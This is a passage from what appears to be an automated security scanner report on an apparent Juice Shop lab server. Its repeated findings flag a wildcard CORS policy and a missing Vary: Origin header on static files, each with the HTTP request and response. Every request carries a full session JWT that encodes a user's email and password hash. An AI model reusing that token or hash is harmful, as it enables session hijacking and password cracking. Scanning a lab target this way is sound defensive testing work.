Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-route/angular-route.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://vizstoizpqzw.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:35 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.49. http://192.168.61.143:3000/public/images/products/bower_components/angular-socket-io/socket.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-socket-io/socket.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://pmeuzefgunue.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-socket-io/socket.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://pmeuzefgunue.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:48 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.50. http://192.168.61.143:3000/public/images/products/bower_components/angular-touch/angular-touch.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-touch/angular-touch.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://mpsplsduixtx.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-touch/angular-touch.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://mpsplsduixtx.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:53 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.51. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://vddqfhikdrad.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-translate-loader-static-files/angular-translate-loader-static-files.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://vddqfhikdrad.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:05 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.52. http://192.168.61.143:3000/public/images/products/bower_components/angular-translate/angular-translate.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular-translate/angular-translate.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://azlpvdpjmbuc.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular-translate/angular-translate.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://azlpvdpjmbuc.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:17:56 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.53. http://192.168.61.143:3000/public/images/products/bower_components/angular/angular.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/angular/angular.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://ffthyazhkpgp.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/angular/angular.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://ffthyazhkpgp.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:16:47 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.54. http://192.168.61.143:3000/public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://ocelkszhvwbg.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://ocelkszhvwbg.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:19 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.55. http://192.168.61.143:3000/public/images/products/bower_components/bootswatch/slate/bootstrap.min.css
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/bootswatch/slate/bootstrap.min.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://xsfisuoicwpc.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/bootswatch/slate/bootstrap.min.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://xsfisuoicwpc.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:28 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.56. http://192.168.61.143:3000/public/images/products/bower_components/clipboard/dist/clipboard.min.js
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/clipboard/dist/clipboard.min.js

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://imqacakvjjsj.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/clipboard/dist/clipboard.min.js HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://imqacakvjjsj.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:31 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.57. http://192.168.61.143:3000/public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://qmiegcgbhpzg.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/flag-icon-css/css/flag-icon.min.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://qmiegcgbhpzg.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:44 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.58. http://192.168.61.143:3000/public/images/products/bower_components/fontawesome/css/font-awesome.min.css
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/fontawesome/css/font-awesome.min.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://vecgqxjmrfvt.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/fontawesome/css/font-awesome.min.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://vecgqxjmrfvt.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:18:58 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.59. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://cfdbwxklvlnx.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

GET /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.css HTTP/1.1
Host: 192.168.61.143:3000
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Origin: http://cfdbwxklvlnx.com
Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
ETag: W/"2639-15942f0cef8"
Content-Type: text/html; charset=UTF-8
Content-Length: 9785
Date: Sun, 15 Jan 2017 21:19:03 GMT
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]>
<html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
...[SNIP]...
2.60. http://192.168.61.143:3000/public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css
Previous  Next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /public/images/products/bower_components/github-fork-ribbon-css/gh-fork-ribbon.ie.css

Issue detail

The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.

The application allowed access from the requested origin http://gjjcueddqtdc.com

If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

Request 1

